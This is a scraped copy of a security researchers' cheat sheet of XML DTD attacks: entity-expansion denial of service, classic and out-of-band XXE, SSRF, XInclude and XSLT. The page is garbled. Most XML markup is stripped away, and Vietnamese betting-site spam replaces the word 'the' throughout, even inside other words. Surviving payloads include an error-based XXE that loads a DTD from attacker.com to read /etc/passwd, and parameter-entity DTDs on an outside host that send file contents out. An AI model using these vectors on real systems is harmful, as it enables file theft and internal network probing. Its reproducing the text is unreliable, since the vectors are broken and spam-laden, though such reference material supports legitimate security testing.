DTD Cheat Sheet

When evaluating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security of XML based services, one should always consider DTD based attack vectors, such as XML External Entities (XXE) as,for example, our previous post XXE in SAML Interfaces demonstrates.

In this post we provide a comprehensive list of different DTD attacks.

The attacks are categorized as follows:

• Denial-of-Service Attacks
• Classic XXE
• Advanced XXE
• Server-Side Requst Forgery (SSRF)
• XInclude
• XSLT

Your can also check out our large-scale parser evaluation against DTD attacks.

Last updated on 16. January 2019.
Please contact us if you  have any missing vectors!

Denial-of-Service Attacks

Testing for Entity Support

]>
&a2;

If this test is successful and and parsing process is slowed down, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is a high probability that your parser is configured insecurely and is vulnerable to at least one kind of DoS.

 

Billion Laughs Attack (Klein, 2002)

]>
&a4;

This file expands to about 30 KByte but has a total of 11111 entity references and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore exceeds a reasonable threshold of entity references.
Source

Billion Laughs Attack - Parameter Entities (Späth, 2015)

]>
&g;

File stored on http://publicServer.com/dos.dtd

%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;">
%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;">
%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;">

Quadratic Blowup Attack

]>
&a0;&a0;...&a0;

Source

Recursive General Entities

This vector is not well-formed by [WFC: No Recursion].

]>
&a;

External General Entities (Steuck, 2002)

The idea of this attack is to declare an external general entity and reference a large file on a network resource or locally (e.g. C:/pagefile.sys or /dev/random).
However, conducting DoS attacks in such a manner is only applicable by making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parser process a large XML document.

]>
&dos;

Source

Classic XXE

Classic XXE Attack (Steuck, 2002)

]>
&file;

We use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file '/sys/power/image_size' as an example, because it is a very simple file (one line, no special characters).

This attack requires a direct feedback channel and reading out files is limited by "forbidden characters in XML" such as "<" and "&".
If such characters occur in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accessed file (e.g. /etc/fstab) cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 XML parser raises an exception and stops cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parsing of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message.

Source

XXE Attack using netdoc

]>
&file;

Source: @Nirgoldshlager

XXE Attack using UTF-16 (Dawid Golunski)

Some simple blacklisting countermeasures can probably bypassed by changing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default XML charset (which is UTF-8), to a different one, for example, UTF-16

encoding="UTF-16"?>



]>
&file;

The above file can be simply created with a texteditor.
To convert it to UTF-16, you can use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 linux tool iconv

# cat file.xml | iconv -f UTF-8 -t UTF-16 > file_utf16.xml

Source, Thanks to @ilmila

XXE Attack using UTF-7

The same trick can be applied to UTF-7 as-well.

encoding="UTF-7" ?>



]>
&file;

# cat file.xml | iconv -f UTF-8 -t UTF-7 > file_utf7.xml

Source, Thanks to @ilmila

Evolved XXE Attacks - Direct Feedback Channel

This class of attacks vectors is called evolved XXE attacks and is used to (i) bypass restrictions of classic XXE attacks and (ii) for Out-of-Band attacks.

Bypassing Restrictions of XXE (Morgan, 2014)

">

%dtd;
]>
&all;

File stored on http://publicServer.com/parameterEntity_core.dtd

 
Source

Bypassing Restrictions of XXE (Späth, 2015)

&all;

File stored on http://publicServer.com/parameterEntity_doctype.dtd

">

XXE by abusing Attribute Values (Yunusov, 2013)

This vector bypasses [WFC: No External Entity References].

%remote;
]>

File stored on http://publicServer.com/external_entity_attribute.dtd

">
%param1;

Source

Error-based XXE using Parameter Entitites (Arseniy Sharoglazov, 2018)

 version="1.0" ?>
 message [
     % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>

File stored on http://attacker.com/ext.dtd

 % file SYSTEM "file:///etc/passwd">
 % eval "">
%eval;
%error;

Source

Abusing local-DTD Files XXE (Arseniy Sharoglazov, 2018)

Because external DTD subsets are prohibited within an internal subset, one can use a a locally existing DTD file as follows:

 version="1.0" ?>
 message [
     % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">

     % condition 'aaa)>
         % file SYSTEM "file:///etc/passwd">
         % eval "">
        %eval;
        %error;
         aa (bb'>

    %local_dtd;
]>
any text

Contents of sig-app_1_0.dtd

… <!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"> <!ELEMENT pattern (%condition;)> …

Source (also providing a list of local DTD files)

Evolved XXE Attacks - Out-of-Band channels

Just because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is no direct feedback channel available does not imply that an XXE attack is not possible.

XXE OOB Attack (Yunusov, 2013)

&send;

File stored on http://publicServer.com/parameterEntity_oob.dtd

">
%all;

Source

XXE OOB Attack - Parameter Entities (Yunusov, 2013)

Here is a variation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 previous attack using only parameter entities.

%remote;
%send;
]>
4

File stored on http://publicServer.com/parameterEntity_sendhttp.dtd

">
%param1;

Source

XXE OOB Attack - Parameter Entities FTP (Novikov, 2014)

Using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FTP protocol, an attacker can read out files of arbitrary length.

%remote;
%send;
]>
4

File stored on http://publicServer.com/parameterEntity_sendftp.dtd

">
%param1;

This attack requires to setup a modified FTP server. However, adjustments to this PoC code are probably necessary to apply it to an arbitrary parser.

Source

SchemaEntity Attack (Späth, 2015)

We identified three variations of this attack using (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude.

schemaLocation

%remote;
]>

 xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="ttt http://publicServer.com/&internal;">4

noNamespaceSchemaLocation

%remote;
]>

    xsi:noNamespaceSchemaLocation="http://publicServer.com/&internal;">

XInclude

%remote;
]>

File stored on http://publicServer.com/external_entity_attribute.dtd

">
%param1;

 

SSRF Attacks

DOCTYPE

]>
4

External General Entity (Steuck, 2002)

]>
&remote;

Although it is best to reference a well-formed XML file (or any text file for that matter), in order not to cause an error, it is possible with some parsers to invoke an URL without referencing a not well-formed file.

Source

External Parameter Entity (Yunusov, 2013)

%remote;
]>
4

File stored on http://publicServer.com/url_invocation_parameterEntity.dtd

Source

XInclude

File stored on http://publicServer.com/file.xml

it_works

schemaLocation

 xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="http://publicServer.com/url_invocation_schemaLocation.xsd">4

File stored on http://publicServer.com/url_invocation_schemaLocation.xsd

<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 

or use this file

<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema"
targetNamespace="http://test.com/attack">
 

noNamespaceSchemaLocation

xsi:noNamespaceSchemaLocation="http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd">4

File stored on http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd

<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 

XXE on JSON Webservices Trick (Antti Rantasaari)

If you pentest a web service that supports JSON, you can try to enforce it parsing XML as well.

The example is copied from this Blogpost by Antti Rantasaari.

Given HTTP example request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

It can be converted to enforce using XML by setting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 HTTP Content-Type to application/xml:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288


]>

name
&xxe;

In this case, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 JSON parameters "name" and "value" are converted to XML elements "" and "" to be Schema conform to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 JSON format.

A root element "" was added around and to get a valid XML document (since an XML document must have exactly one root element).

The XXE attack might also work by simply adding one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r attack vectors of this blog.

Source

 XInclude Attacks (Morgan, 2014)

Source

XSLT Attacks

   
       
   

Authors of this Post

Christopher Späth 
Christian Mainka (@CheariX)
Vladislav Mladenov